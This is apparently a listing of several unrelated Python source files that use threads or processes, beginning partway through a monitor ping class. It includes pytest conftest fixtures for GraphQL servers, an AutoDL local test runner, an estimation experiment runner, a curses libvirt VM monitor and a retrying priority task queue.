self.check_ping_thread = threading.Thread(target=self.check_pings)
self.check_ping_thread.start()
logger.info("initialized monitor connector")
def ping(self, name):
self.status[name] = int(time.time())
logger.info("ping by "+str(name))
def check_pings(self):
while True:
logger.debug("ping status : "+str(self.status))
current_time = int(time.time())
ping_delayed = False
for name, last in self.status.items():
if current_time - last > self.ping_frequency:
ping_delayed = True
break
if not ping_delayed:
self.monitor.send_monitor_ping(self.ping_frequency)
logger.info("monitor ping sent")
else:
logger.info("monitor ping not sent")
sleep_time = self.ping_frequency - (time.time() - current_time)
if sleep_time > 0:
time.sleep(sleep_time)
|
conftest.py
|
import pytest
import time
from context import HGECtx, HGECtxError, EvtsWebhookServer, HGECtxGQLServer, GQLWsClient
import threading
import random
from datetime import datetime
import sys
import os
def pytest_addoption(parser):
parser.addoption(
"--hge-urls",
metavar="HGE_URLS",
help="csv list of urls for graphql-engine",
required=False,
nargs='+'
)
parser.addoption(
"--pg-urls", metavar="PG_URLS",
help="csv list of urls for connecting to Postgres directly",
required=False,
nargs='+'
)
parser.addoption(
"--hge-key", metavar="HGE_KEY", help="admin secret key for graphql-engine", required=False
)
parser.addoption(
"--hge-webhook", metavar="HGE_WEBHOOK", help="url for graphql-engine's access control webhook", required=False
)
parser.addoption(
"--test-webhook-insecure", action="store_true",
help="Run Test cases for insecure https webhook"
)
parser.addoption(
"--hge-jwt-key-file", metavar="HGE_JWT_KEY_FILE", help="File containting the private key used to encode jwt tokens using RS512 algorithm", required=False
)
parser.addoption(
"--hge-jwt-conf", metavar="HGE_JWT_CONF", help="The JWT conf", required=False
)
parser.addoption(
"--test-cors", action="store_true",
required=False,
help="Run testcases for CORS configuration"
)
parser.addoption(
"--test-ws-init-cookie",
metavar="read|noread",
required=False,
help="Run testcases for testing cookie sending over websockets"
)
parser.addoption(
"--test-metadata-disabled", action="store_true",
help="Run Test cases with metadata queries being disabled"
)
parser.addoption(
"--test-graphql-disabled", action="store_true",
help="Run Test cases with GraphQL queries being disabled"
)
parser.addoption(
"--test-hge-scale-url",
metavar="<url>",
required=False,
help="Run testcases for horizontal scaling"
)
parser.addoption(
"--test-allowlist-queries", action="store_true",
help="Run Test cases with allowlist queries enabled"
)
parser.addoption(
"--test-logging",
action="store_true",
default=False,
required=False,
help="Run testcases for logging"
)
parser.addoption(
"--accept",
action="store_true",
default=False,
required=False,
help="Accept any failing test cases from YAML files as correct, and write the new files out to disk."
)
#By default,
#1) Set default parallelism to one
#2) Set test grouping to by filename (--dist=loadfile)
def pytest_cmdline_preparse(config, args):
worker = os.environ.get('PYTEST_XDIST_WORKER')
if 'xdist' in sys.modules and not worker: # pytest-xdist plugin
num = 1
args[:] = ["-n" + str(num),"--dist=loadfile"] + args
def pytest_configure(config):
if is_master(config):
if not config.getoption('--hge-urls'):
print("hge-urls should be specified")
if not config.getoption('--pg-urls'):
print("pg-urls should be specified")
config.hge_url_list = config.getoption('--hge-urls')
config.pg_url_list = config.getoption('--pg-urls')
config.hge_ctx_gql_server = HGECtxGQLServer(config.hge_url_list)
if config.getoption('-n', default=None):
xdist_threads = config.getoption('-n')
assert xdist_threads <= len(config.hge_url_list), "Not enough hge_urls specified, Required " + str(xdist_threads) + ", got " + str(len(config.hge_url_list))
assert xdist_threads <= len(config.pg_url_list), "Not enough pg_urls specified, Required " + str(xdist_threads) + ", got " + str(len(config.pg_url_list))
random.seed(datetime.now())
@pytest.hookimpl(optionalhook=True)
def pytest_configure_node(node):
node.slaveinput["hge-url"] = node.config.hge_url_list.pop()
node.slaveinput["pg-url"] = node.config.pg_url_list.pop()
def pytest_unconfigure(config):
config.hge_ctx_gql_server.teardown()
@pytest.fixture(scope='module')
def hge_ctx(request):
config = request.config
print("create hge_ctx")
if is_master(config):
hge_url = config.hge_url_list[0]
else:
hge_url = config.slaveinput["hge-url"]
if is_master(config):
pg_url = config.pg_url_list[0]
else:
pg_url = config.slaveinput["pg-url"]
hge_key = config.getoption('--hge-key')
hge_webhook = config.getoption('--hge-webhook')
webhook_insecure = config.getoption('--test-webhook-insecure')
hge_jwt_key_file = config.getoption('--hge-jwt-key-file')
hge_jwt_conf = config.getoption('--hge-jwt-conf')
ws_read_cookie = config.getoption('--test-ws-init-cookie')
metadata_disabled = config.getoption('--test-metadata-disabled')
hge_scale_url = config.getoption('--test-hge-scale-url')
try:
hge_ctx = HGECtx(
hge_url=hge_url,
pg_url=pg_url,
hge_key=hge_key,
hge_webhook=hge_webhook,
webhook_insecure=webhook_insecure,
hge_jwt_key_file=hge_jwt_key_file,
hge_jwt_conf=hge_jwt_conf,
ws_read_cookie=ws_read_cookie,
metadata_disabled=metadata_disabled,
hge_scale_url=hge_scale_url,
)
except HGECtxError as e:
assert False, "Error from hge_cxt: " + str(e)
# TODO this breaks things (https://github.com/pytest-dev/pytest-xdist/issues/86)
# so at least make sure the real error gets printed (above)
pytest.exit(str(e))
yield hge_ctx # provide the fixture value
print("teardown hge_ctx")
hge_ctx.teardown()
time.sleep(1)
@pytest.fixture(scope='class')
def evts_webhook(request):
webhook_httpd = EvtsWebhookServer(server_address=('127.0.0.1', 5592))
web_server = threading.Thread(target=webhook_httpd.serve_forever)
web_server.start()
yield webhook_httpd
webhook_httpd.shutdown()
webhook_httpd.server_close()
web_server.join()
@pytest.fixture(scope='class')
def ws_client(request, hge_ctx):
client = GQLWsClient(hge_ctx, '/v1/graphql')
time.sleep(0.1)
yield client
client.teardown()
@pytest.fixture(scope='class')
def setup_ctrl(request, hge_ctx):
"""
This fixture is used to store the state of test setup in some test classes.
Used primarily when teardown is skipped for some test cases in a class where the test is not expected to change the database state.
"""
setup_ctrl = { "setupDone" : False }
yield setup_ctrl
hge_ctx.may_skip_test_teardown = False
request.cls().do_teardown(setup_ctrl, hge_ctx)
def is_master(config):
"""True if the code running the given pytest.config object is running in a xdist master
node or not running xdist at all.
"""
return not hasattr(config, 'slaveinput')
|
run_local_test.py
|
# Author: Zhengying LIU
# Creation date: 20 Sep 2018
"""This script allows participants to run local test of their method within the
downloaded starting kit folder (and avoid using submission quota on CodaLab). To
do this, run:
```
python run_local_test.py -dataset_dir='./AutoDL_sample_data/' -code_dir='./AutoDL_sample_code_submission/'
```
in the starting kit directory. If you want to test the performance of a
different algorithm on a different dataset, please specify them using respective
arguments (flags).
If you want to use default folders (i.e. those in above command line), simply
run
```
python run_local_test.py
```
"""
import tensorflow as tf
import os
import time
import webbrowser
from multiprocessing import Process
def _HERE(*args):
h = os.path.dirname(os.path.realpath(__file__))
return os.path.join(h, *args)
def get_path_to_ingestion_program(starting_kit_dir):
return os.path.join(starting_kit_dir,
'AutoDL_ingestion_program', 'ingestion.py')
def get_path_to_scoring_program(starting_kit_dir):
return os.path.join(starting_kit_dir,
'AutoDL_scoring_program', 'score.py')
def run_baseline(dataset_dir, code_dir):
# Current directory containing this script
starting_kit_dir = os.path.dirname(os.path.realpath(__file__))
path_ingestion = get_path_to_ingestion_program(starting_kit_dir)
path_scoring = get_path_to_scoring_program(starting_kit_dir)
# Run ingestion and scoring at the same time
command_ingestion = 'python {} {} {}'.format(path_ingestion, dataset_dir, code_dir)
command_scoring = 'python {} {}'.format(path_scoring, dataset_dir)
def run_ingestion():
os.system(command_ingestion)
def run_scoring():
os.system(command_scoring)
ingestion_process = Process(name='ingestion', target=run_ingestion)
scoring_process = Process(name='scoring', target=run_scoring)
ingestion_process.start()
scoring_process.start()
detailed_results_page = os.path.join(starting_kit_dir,
'AutoDL_scoring_output',
'detailed_results.html')
detailed_results_page = os.path.abspath(detailed_results_page)
# Open detailed results page in a browser
time.sleep(2)
for i in range(30):
if os.path.isfile(detailed_results_page):
webbrowser.open('file://'+detailed_results_page, new=2)
break
time.sleep(1)
if __name__ == '__main__':
default_starting_kit_dir = os.path.abspath(os.path.join(_HERE()))
default_dataset_dir = os.path.join(default_starting_kit_dir,
'AutoDL_sample_data')
default_code_dir = os.path.join(default_starting_kit_dir,
'AutoDL_sample_code_submission')
tf.flags.DEFINE_string('dataset_dir', default_dataset_dir,
"Directory containing the content (e.g. adult.data/ + "
"adult.solution) of an AutoDL dataset. Specify this "
"argument if you want to test on a different dataset.")
tf.flags.DEFINE_string('code_dir', default_code_dir,
"Directory containing a `model.py` file. Specify this "
"argument if you want to test on a different algorithm.")
FLAGS = tf.flags.FLAGS
dataset_dir = FLAGS.dataset_dir
code_dir = FLAGS.code_dir
run_baseline(dataset_dir, code_dir)
|
conftest.py
|
# Copyright 2019 Axis Communications AB.
#
# For a full list of individual contributors, please see the commit history.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -*- coding: utf-8 -*-
import os
import threading
import pytest
from eiffel_graphql_api.graphql.api import APP
from eiffel_graphql_api.graphql.db.database import get_client
def start():
"""Start a GraphQL API for testing."""
APP.run("127.0.0.1", 12345)
@pytest.fixture(scope="session", autouse=True)
def start_server(request):
"""Start the Graphql API server in a thread. This is done once per test session."""
client = get_client(mock=True)
thread = threading.Thread(target=start)
thread.daemon = True
thread.start()
client.drop_database(os.getenv("DATABASE_NAME"))
def start_server_fin():
"""Drop the MongoDB database as a cleanup measure."""
client.drop_database(os.getenv("DATABASE_NAME"))
request.addfinalizer(start_server_fin)
|
run_experiments_estimation.py
|
import json
import os
from collections import defaultdict
from multiprocessing import Queue, Process
import numpy as np
from experiment_setups.estimation_experiment_setups import simple_iv_setup, \
heteroskedastic_iv_setup, policy_learning_setup
from utils.hyperparameter_optimization import iterate_placeholder_values, \
fill_placeholders, fill_global_values
setup_list = [simple_iv_setup, heteroskedastic_iv_setup, policy_learning_setup]
save_dir = "results_estimation"
def main():
for setup in setup_list:
run_experiment(setup)
def run_experiment(setup):
results = []
n_range = sorted(setup["n_range"], reverse=True)
num_procs = setup["num_procs"]
num_reps = setup["num_reps"]
num_jobs = len(n_range) * num_reps
if num_procs == 1:
# run jobs sequentially
for n in n_range:
for rep_i in range(setup["num_reps"]):
results.extend(do_job(setup, n, rep_i, verbose=True))
else:
# run jobs in separate processes using a queued job system
jobs_queue = Queue()
results_queue = Queue()
for n in n_range:
for rep_i in range(setup["num_reps"]):
jobs_queue.put((setup, n, rep_i))
procs = []
for i in range(num_procs):
p = Process(target=run_jobs_loop, args=(jobs_queue, results_queue))
procs.append(p)
jobs_queue.put("STOP")
p.start()
num_done = 0
while num_done < num_jobs:
results.extend(results_queue.get())
num_done += 1
for p in procs:
p.join()
# build aggregate results
aggregate_results = build_aggregate_results(results)
if not os.path.exists(save_dir):
os.makedirs(save_dir)
save_path = os.path.join(save_dir, "%s_results.json" % setup["setup_name"])
with open(save_path, "w") as f:
output = {"results": results, "setup": setup,
"aggregate_results": aggregate_results}
json.dump(output, f, default=lambda c_: c_.__name__,
indent=2, sort_keys=True)
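# Each worker process below pulls (setup, n, rep_i) jobs off jobs_queue until
# it reads the "STOP" sentinel (one sentinel is enqueued per process above).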
def run_jobs_loop(jobs_queue, results_queue):
for job_args in iter(jobs_queue.get, "STOP"):
results = do_job(*job_args)
results_queue.put(results)
def do_job(setup, n, rep_i, verbose=False):
results = []
print("setting up scenario for %s setup (n=%d, rep=%d)"
% (setup["setup_name"], n, rep_i))
scenario_class = setup["scenario"]["class"]
scenario_args = setup["scenario"]["args"]
scenario = scenario_class(**scenario_args)
scenario.setup(num_train=n, num_dev=n,
num_test=setup["num_test"])
train = scenario.get_dataset("train")
dev = scenario.get_dataset("dev")
test = scenario.get_dataset("test")
k_z_class = setup["dev_z_kernel_class"]
k_z_args = setup["dev_z_kernel_args"]
rho_dim = scenario.get_rho_dim()
setup["rho_dim"] = scenario.get_rho_dim()
setup["z_dim"] = scenario.get_z_dim()
if isinstance(k_z_class, list):
k_z_list = [c_(**a_) for c_, a_ in zip(k_z_class, k_z_args)]
else:
k_z_list = [k_z_class(**k_z_args) for _ in range(rho_dim)]
for k_z in k_z_list:
k_z.train(train.z)
for method in setup["methods"]:
if verbose:
print("running iv_methods %s under %s setup (n=%d, rep=%d)"
% (method["name"], setup["setup_name"], n, rep_i))
placeholder_options = method["placeholder_options"]
for placeholder_values in iterate_placeholder_values(
placeholder_options):
if placeholder_values:
print("using placeholder values", placeholder_values)
rho_generator = scenario.get_rho_generator()
args = fill_global_values(method["args"], setup)
args = fill_placeholders(args, placeholder_values)
predictor = method["class"](rho_generator=rho_generator,
rho_dim=rho_dim, **args)
predictor.fit(x=train.x, z=train.z, x_dev=dev.x, z_dev=dev.z)
predicted_params = predictor.get_fitted_parameter_vector()
true_params = scenario.get_true_parameter_vector()
sq_error = float(((predicted_params - true_params) ** 2).sum())
param_dict = predictor.get_fitted_parameter_dict()
dev_mmr_loss = predictor.calc_mmr_loss(k_z_list, dev.x, dev.z)
risk = scenario.calc_test_risk(test.x, test.z, predictor)
row = {
"n": n,
"dev_mmr_loss": dev_mmr_loss,
"method": method["name"],
"rep": rep_i,
"sq_error": sq_error,
"predicted_params": param_dict,
"placeholder_values": placeholder_values,
"risk": risk,
}
results.append(row)
if verbose:
print(json.dumps(row, sort_keys=True, indent=2))
if verbose:
print("")
return results
def build_aggregate_results(results):
se_list_collection = defaultdict(lambda: defaultdict(list))
risk_list_collection = defaultdict(lambda: defaultdict(list))
for row in results:
method = row["method"]
n = row["n"]
key = "%05d::%s" % (n, method)
hyperparam_values = tuple(sorted(row["placeholder_values"].items()))
se_list_collection[key][hyperparam_values].append(row["sq_error"])
risk_list_collection[key][hyperparam_values].append(row["risk"])
aggregate_results = {}
for key in sorted(se_list_collection.keys()):
n = int(key.split("::")[0])
method = key.split("::")[1]
print("aggregate results for n=%d, method: %s" % (n, method))
aggregate_results[key] = []
for hyperparam_values in sorted(se_list_collection[key].keys()):
sq_error_list = se_list_collection[key][hyperparam_values]
se_mean = float(np.mean(sq_error_list))
se_std = float(np.std(sq_error_list))
se_max = float(np.max(sq_error_list))
risk_list = risk_list_collection[key][hyperparam_values]
risk_mean = float(np.mean(risk_list))
risk_std = float(np.std(risk_list))
risk_max = float(np.max(risk_list))
print("%r: mse = %f ± %f (max %f) --- risk = %f ± %f (max %f)"
% (hyperparam_values, se_mean, se_std, se_max,
risk_mean, risk_std, risk_max))
result = {
"hyperparam_values": dict(hyperparam_values),
"mean_square_error": se_mean,
"std_square_error": se_std,
"max_square_error": se_max,
"mean_risk": risk_mean,
"std_risk": risk_std,
"max_risk": risk_max,
}
aggregate_results[key].append(result)
return aggregate_results
if __name__ == "__main__":
main()
|
runner.py
|
#!/usr/bin/env python
""" This is an example for what a project looks like
with multiple modules and threads while trying to use best practices.
"""
# Imports
import time
import threading
# local
from anaconda.hello import hello
from anaconda.world import world
# Storage
hello_running = False
world_running = False
def toggle_hello():
"""Run / stop hello, could ask for some parameters before running the function and pass that to the
hello.start_loop with threading.Thread(target=hello.start_loop, args=(paramet,))"""
global hello_running
hello_running ^= True # Toggle global parameter so this acts like a switch
if hello_running:
hello.set_should_loop(True)
# Should start multithreading here so this runner thread is not blocked.
# threading = more lightweight than multiprocessing
# coroutines are even better but didn't look into that yet
hello_thread = threading.Thread(target=hello.start_loop)
hello_thread.start()
else:
hello.set_should_loop(False)
def toggle_world():
"""Run / stop hello, could ask for some parameters before running the function and pass that to the
hello.start_loop with threading.Thread(target=hello.start_loop, args=(paramet,))"""
global world_running
world_running ^= True # Toggle global parameter so this acts like a switch
if world_running:
world.set_should_loop(True)
# Should start multithreading here so this runner thread is not blocked.
# threading = more lightweight than multiprocessing
# coroutines are even better but I don't know about them (just yet)
world_thread = threading.Thread(target=world.start_loop)
world_thread.start()
return
else:
world.set_should_loop(False)
return
def start():
"""Start our script/program"""
# needed variables
global hello_running
global world_running
# Print our menu
# Keeps looping so the menu will always be there after a choice is done.
while(True):
# Option 1
if hello_running:
print('[1] | Stop hello')
else:
print('[1] | Run hello')
# Option 2
if world_running:
print('[2] | Stop world')
else:
print('[2] | Run world')
# Exit
print('[3] | Exit program')
option = ''
try:
option = int(input('Enter your choice: '))
except ValueError:
print('Wrong input. Please enter a number ...')
#Check what choice was entered and act accordingly
if option == 1:
toggle_hello()
elif option == 2:
toggle_world()
elif option == 3:
print('Quitting program..')
exit()
else:
print('Invalid option. Please enter a number between 1 and 3.')
if __name__ == '__main__':
start()
|
vmtop.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import division
import curses
import libvirt
import threading
import time
from ovm.lvconnect import LibvirtConnect
from ovm.utils.printer import si_unit
UPDATE_DATA_INTERVAL = 1
REFRESH_INTERVAL = 0.5
SORT_NAME, SORT_CPU, SORT_MEM = 0, 1, 3
class DomainStats:
def __init__(self, domain, host_stats):
self.domain = domain
self.name = domain.name()
self.host_stats = host_stats
# CPU
self.cpu_usage = 0
self.cpu_time = 0
# Memory
self.host_mem = self.guest_mem = 0
# Network
self.net_rx_bytes = self.net_tx_bytes = 0
self.net_rx_rate = self.net_tx_rate = 0
# Storage
self.block_rd_bytes = self.block_wr_bytes = 0
self.block_rd_rate = self.block_wr_rate = 0
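# Note: compute_cpu_usage assumes the vcpu time counters are reported in
# nanoseconds, so dividing the delta by UPDATE_DATA_INTERVAL * cpu_count * 10**7
# yields a percentage of total host CPU capacity over the interval.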
@staticmethod
def compute_cpu_usage(prev, cur, cpu_count):
return min(
(cur - prev) / (UPDATE_DATA_INTERVAL * cpu_count * 10**7),
100
)
def update_cpu(self, stats):
previous_cpu_time = self.cpu_time
domain_cpu_count = stats.get('vcpu.current', 1)
sum_time = 0
for i in range(domain_cpu_count):
sum_time += stats.get('vcpu.{}.time'.format(i), 0)  # sum time across all vcpus
current_cpu_time = sum_time / domain_cpu_count
if previous_cpu_time > 0:
self.cpu_usage = self.compute_cpu_usage(
previous_cpu_time, current_cpu_time, self.host_stats.cpu_count
)
self.cpu_time = current_cpu_time
def update_memory(self, stats):
# Current memory allocated on the host
self.host_mem = self.domain.memoryStats().get('rss', 0) * 1024
# guest current max memory
self.guest_mem = stats.get('balloon.maximum', 0) * 1024
def update_network(self, stats):
current_rx_bytes = stats.get('net.0.rx.bytes', 0)
current_tx_bytes = stats.get('net.0.tx.bytes', 0)
previous_rx_bytes = self.net_rx_bytes
previous_tx_bytes = self.net_tx_bytes
if previous_rx_bytes > 0:
self.net_rx_rate = (
(current_rx_bytes - previous_rx_bytes) * 8
/ UPDATE_DATA_INTERVAL
)
if previous_tx_bytes > 0:
self.net_tx_rate = (
(current_tx_bytes - previous_tx_bytes) * 8
/ UPDATE_DATA_INTERVAL
)
self.net_rx_bytes = current_rx_bytes
self.net_tx_bytes = current_tx_bytes
def update_storage(self, stats):
current_rd_bytes = stats.get('block.0.rd.bytes', 0)
current_wd_bytes = stats.get('block.0.wr.bytes', 0)
previous_rd_bytes = self.block_rd_bytes
previous_wd_bytes = self.block_wr_bytes
if previous_rd_bytes > 0:
self.block_rd_rate = (
(current_rd_bytes - previous_rd_bytes) * 8
/ UPDATE_DATA_INTERVAL
)
if previous_wd_bytes > 0:
self.block_wr_rate = (
(current_wd_bytes - previous_wd_bytes) * 8
/ UPDATE_DATA_INTERVAL
)
self.block_rd_bytes = current_rd_bytes
self.block_wr_bytes = current_wd_bytes
def update(self, stats):
for name in ('cpu', 'memory', 'network', 'storage'):
getattr(self, 'update_%s' % name)(stats)
def format(self, pattern):
stats = {
'name': self.name,
'cpu_usage': round(self.cpu_usage),
'guest_mem': si_unit(self.guest_mem, True) + 'B',
'host_mem': si_unit(self.host_mem, True) + 'B',
'net_rx': '{0}bps'.format(si_unit(self.net_rx_rate)),
'net_tx': '{0}bps'.format(si_unit(self.net_tx_rate)),
'block_rd': '{0}bps'.format(si_unit(self.block_rd_rate)),
'block_wr': '{0}bps'.format(si_unit(self.block_wr_rate))
}
return pattern.format(**stats)
class HostStats:
def __init__(self, connection):
self._connection = connection
self.hostname = connection.getHostname()
host_info = connection.getInfo()
self.cpu_count = host_info[2]
self.cpu_freq = host_info[3] * (10**6)
self.cpu_time = 0
self.cpu_usage = 0
self.mem_vms_total = 0
self.mem_os = 0
self.mem_total = 0
self.mem_cached = 0
self.domain_count = 0
def update(self, total_mem_domain, domain_count):
self.domain_count = domain_count
host_info = self._connection.getInfo()
self.cpu_freq = host_info[3] * (10**6)
cpu_stats = self._connection.getCPUStats(
libvirt.VIR_NODE_CPU_STATS_ALL_CPUS)
cpu_time = sum((cpu_stats[k] for k in ('kernel', 'user', 'iowait'))) \
/ self.cpu_count
if self.cpu_time > 0:
self.cpu_usage = min(1, ((cpu_time - self.cpu_time)
/ (UPDATE_DATA_INTERVAL * 10**9)))
self.cpu_time = cpu_time
mem_stats = self._connection.getMemoryStats(
libvirt.VIR_NODE_MEMORY_STATS_ALL_CELLS
)
self.mem_total = mem_stats['total'] * 1024
self.mem_vms_total = total_mem_domain
self.mem_os = ((mem_stats['total'] - mem_stats['free']
- mem_stats['cached']
- mem_stats['buffers']) * 1024
- total_mem_domain)
self.mem_cached = (mem_stats['cached'] - mem_stats['buffers']) * 1024
class VMTop:
def __init__(self):
self._domains = {}
self.libvirt_conn = LibvirtConnect.get_connection()
self._sort_on = SORT_NAME
self.host_stats = HostStats(self.libvirt_conn)
self.screen = curses.initscr()
self.init_terminal()
# Init colors
colors = (
('TABLE_HEADER', curses.COLOR_BLACK, curses.COLOR_GREEN),
('TABLE_HEADER_SELECTED', curses.COLOR_BLACK, curses.COLOR_CYAN),
('RED_ON_BLACK', curses.COLOR_RED, curses.COLOR_BLACK),
('GREEN_ON_BLACK', curses.COLOR_GREEN, curses.COLOR_BLACK),
('CYAN_ON_BLACK', curses.COLOR_CYAN, curses.COLOR_BLACK),
('BLACK_ON_CYAN', curses.COLOR_BLACK, curses.COLOR_CYAN),
('YELLOW_ON_BLACK', curses.COLOR_YELLOW, curses.COLOR_BLACK)
)
for i, color in enumerate(colors, 1):
name, fg, bg = color
curses.init_pair(i, fg, bg)
setattr(self, name, curses.color_pair(i))
try:
self.main()
finally:
self.reset_terminal()
def main(self):
refresh_thread = threading.Thread(target=self.refresh)
refresh_thread.daemon = True
refresh_thread.start()
update_data_thread = threading.Thread(target=self.update_data)
update_data_thread.daemon = True
update_data_thread.start()
while True:
event = self.screen.getch()
if event == ord('c'):
self._sort_on = SORT_CPU
elif event == ord('n'):
self._sort_on = SORT_NAME
elif event == ord('m'):
self._sort_on = SORT_MEM
elif event == ord('q'):
break
def init_terminal(self):
curses.start_color()
curses.noecho()
curses.cbreak()
curses.curs_set(0)
self.screen.keypad(1)
self.screen.clear()
self.screen.refresh()
def reset_terminal(self):
curses.nocbreak()
self.screen.keypad(0)
curses.echo()
curses.endwin()
def update_data(self):
while True:
self._update_data()
time.sleep(UPDATE_DATA_INTERVAL)
def _update_data(self):
total_mem_domain = 0
domains = self.libvirt_conn.getAllDomainStats(
flags=libvirt.VIR_CONNECT_GET_ALL_DOMAINS_STATS_RUNNING
)
current_domains = set()
for domain, libvirt_stats in domains:
name = domain.name()
current_domains.add(name)
if name not in self._domains:
self._domains[name] = DomainStats(domain, self.host_stats)
self._domains[name].update(libvirt_stats)
total_mem_domain += self._domains[name].host_mem
# Delete all domains not active in domain stats list
deleted_domains = set(self._domains.keys()) - current_domains
list(map(self._domains.pop, deleted_domains))
domain_count = len(current_domains)
self.host_stats.update(total_mem_domain, domain_count)
def draw_host_bar(self, line):
style = self.CYAN_ON_BLACK
bar_format = ' :: '.join((
'{hostname}',
'CPU: {cpu_count} ({cpu_freq} MHz)',
'Memory: {mem_total}iB',
'Domains: {domain_count}'
))
text = bar_format.format(
hostname=self.host_stats.hostname,
cpu_count=self.host_stats.cpu_count,
cpu_freq=int(self.host_stats.cpu_freq / 10**6),
mem_total=si_unit(self.host_stats.mem_total),
domain_count=self.host_stats.domain_count
)
self.screen.addstr(line, 0, text, style)
self.screen.clrtoeol()
def draw_cpu_bar(self, line):
# Some params
bar_graph_width = 40
        # Initialize the line
self.screen.move(line, 0)
self.screen.clrtoeol()
# Show 'CPU'
self.screen.move(line, 1)
self.screen.addstr('CPU', self.CYAN_ON_BLACK)
# Print the left side of the bar graph
self.screen.addstr(' [')
        # Print the CPU usage as pipes
pipe_count = int(round(self.host_stats.cpu_usage * bar_graph_width))
self.screen.addstr('|' * pipe_count, self.RED_ON_BLACK)
# Print the right side of the bar graph
_, x = self.screen.getyx()
self.screen.move(line, x + bar_graph_width - pipe_count)
self.screen.addstr('] ')
self.screen.addstr('{0} %'.format(
round(self.host_stats.cpu_usage * 100)))
def draw_memory_bar(self, line):
current_bar_size = 0
# Some params
bar_graph_width = 40
        # Initialize the line
self.screen.move(line, 0)
self.screen.clrtoeol()
# Show 'Mem'
self.screen.move(line, 1)
self.screen.addstr('Mem', self.CYAN_ON_BLACK)
# Print the left side of the bar graph
self.screen.addstr(' [')
        # Print the memory taken by the OS
if self.host_stats.mem_total > 0:
ratio = self.host_stats.mem_os / self.host_stats.mem_total
mem_os_size = int(round(ratio * bar_graph_width))
self.screen.addstr('|' * mem_os_size, self.RED_ON_BLACK)
current_bar_size += mem_os_size
        # Print the memory taken by VMs
if self.host_stats.mem_total > 0:
ratio = self.host_stats.mem_vms_total / self.host_stats.mem_total
mem_vms_size = int(round(ratio * bar_graph_width))
self.screen.addstr('|' * mem_vms_size, self.GREEN_ON_BLACK)
current_bar_size += mem_vms_size
# Print the memory cached
if self.host_stats.mem_total > 0:
ratio = self.host_stats.mem_cached / self.host_stats.mem_total
mem_cached_size = int(round(ratio * bar_graph_width))
self.screen.addstr('|' * mem_cached_size, self.YELLOW_ON_BLACK)
current_bar_size += mem_cached_size
# Print the right side of the bar graph
_, x = self.screen.getyx()
self.screen.move(line, x + bar_graph_width - current_bar_size)
self.screen.addstr('] ')
# Print the text aside
self.screen.addstr(
'{0}B'.format(si_unit(self.host_stats.mem_os, True)),
self.RED_ON_BLACK
)
self.screen.addstr(' / ')
self.screen.addstr(
'{0}B'.format(si_unit(self.host_stats.mem_vms_total, True)),
self.GREEN_ON_BLACK
)
self.screen.addstr(
' / {0}B'.format(si_unit(self.host_stats.mem_total, True))
)
def draw_domains(self, line):
# Initialize columns
TABLES_COLS = (
'{name:15}', '{cpu_usage:>8}', '{guest_mem:>10}', '{host_mem:>10}',
'{net_rx:>10}', '{net_tx:>10}', '{block_rd:>10}', '{block_wr:>10}'
)
# Prepare table header
COLS_NAME = dict(
name='NAME', cpu_usage='%CPU', guest_mem='MEM',
host_mem='HOST MEM', net_rx='NET RX', net_tx='NET TX',
block_rd='BLK RD', block_wr='BLK WR')
# Draw the header
self.screen.move(line, 0)
for i, pattern in enumerate(TABLES_COLS):
if self._sort_on == i:
color = self.TABLE_HEADER_SELECTED
else:
color = self.TABLE_HEADER
text = pattern.format(**COLS_NAME)
self.screen.addstr(text, color)
self.screen.addstr(
' '*(self.screen.getmaxyx()[1] - self.screen.getyx()[1]),
self.TABLE_HEADER)
domains = list(self._domains.values())
domains.sort(key=lambda dom: dom.name)
if self._sort_on == SORT_CPU:
domains.sort(key=lambda dom: dom.cpu_usage, reverse=True)
elif self._sort_on == SORT_MEM:
domains.sort(key=lambda dom: dom.host_mem, reverse=True)
for domain in domains:
self.screen.addstr(domain.format(''.join(TABLES_COLS)))
self.screen.clrtoeol()
self.screen.addch('\n')
self.screen.clrtobot()
def refresh_interface(self):
self.draw_host_bar(0)
self.draw_cpu_bar(2)
self.draw_memory_bar(3)
self.draw_domains(5)
self.screen.refresh()
def refresh(self):
while True:
try:
self.refresh_interface()
except curses.error:
pass
finally:
time.sleep(REFRESH_INTERVAL)
if __name__ == '__main__':
VMTop()
|
task_queue.py
|
from collections import defaultdict
from enum import Enum
from logging import getLogger
from queue import PriorityQueue
from time import sleep, time
from threading import Thread, Lock
from typing import Callable
logger = getLogger('task_queue')
class Signal(Enum):
"""A special signal to send to a worker queue."""
STOP = 'stop'
class RunState(Enum):
"""Enum to specify the running state of the task queue."""
STOPPED = 'stopped'
RUNNING = 'running'
class TaskQueue:
"""Class to asynchronously handle tasks in the background."""
def __init__(self, num_workers: int = 1):
"""Initialize the task queue.
        Args:
num_workers: How many worker threads to launch to process tasks.
"""
self.num_workers = num_workers
self.queue = PriorityQueue()
# Map from task id to latest version number for that task
self.tasks = defaultdict(int)
self.task_locks = defaultdict(Lock)
self.run_state = RunState.STOPPED
self.threads = []
def run_worker(self, i, num_retries=5):
"""Function each worker will run.
Args:
i: The thread index.
            num_retries: How many times to retry the task.
"""
logger.info('Initialized task worker %s', i)
while True:
# Get the next task.
task = self.queue.get()
# Check any special signals.
if task[1] == Signal.STOP:
break
# Otherwise it is a real task to run.
time_to_run, task_args = task
task_id, task_version, fn, args, kwargs = task_args
logger.info('Worker received task %s', task_id)
logger.info('Task queue size %s', self.queue.qsize())
# If there is a newer version of the task, skip this one
with self.task_locks[task_id]:
if self.tasks[task_id] > task_version:
logger.info('Task cancelled')
self.queue.task_done()
continue
# Sleep until we are ready to run the code
            time_to_sleep = max(0, time_to_run - time())
logger.info('Time to sleep %s', time_to_sleep)
if time_to_sleep > 0:
sleep(time_to_sleep)
# Make this check again
with self.task_locks[task_id]:
if self.tasks[task_id] > task_version:
logger.info('Task cancelled')
self.queue.task_done()
continue
# Run the function, retry on failures
finished = False
for backoff in [2**i for i in range(num_retries + 1)]:
try:
fn(*args, **kwargs)
finished = True
break
except Exception as e:
logger.info('An error occurred: %s', str(e))
logger.info('Sleeping %s', backoff)
sleep(backoff)
# Put the task back in the queue if we still failed
if not finished:
logger.info('Task failed, reinserting into queue %s', task_id)
self.queue.put(task)
self.queue.task_done()
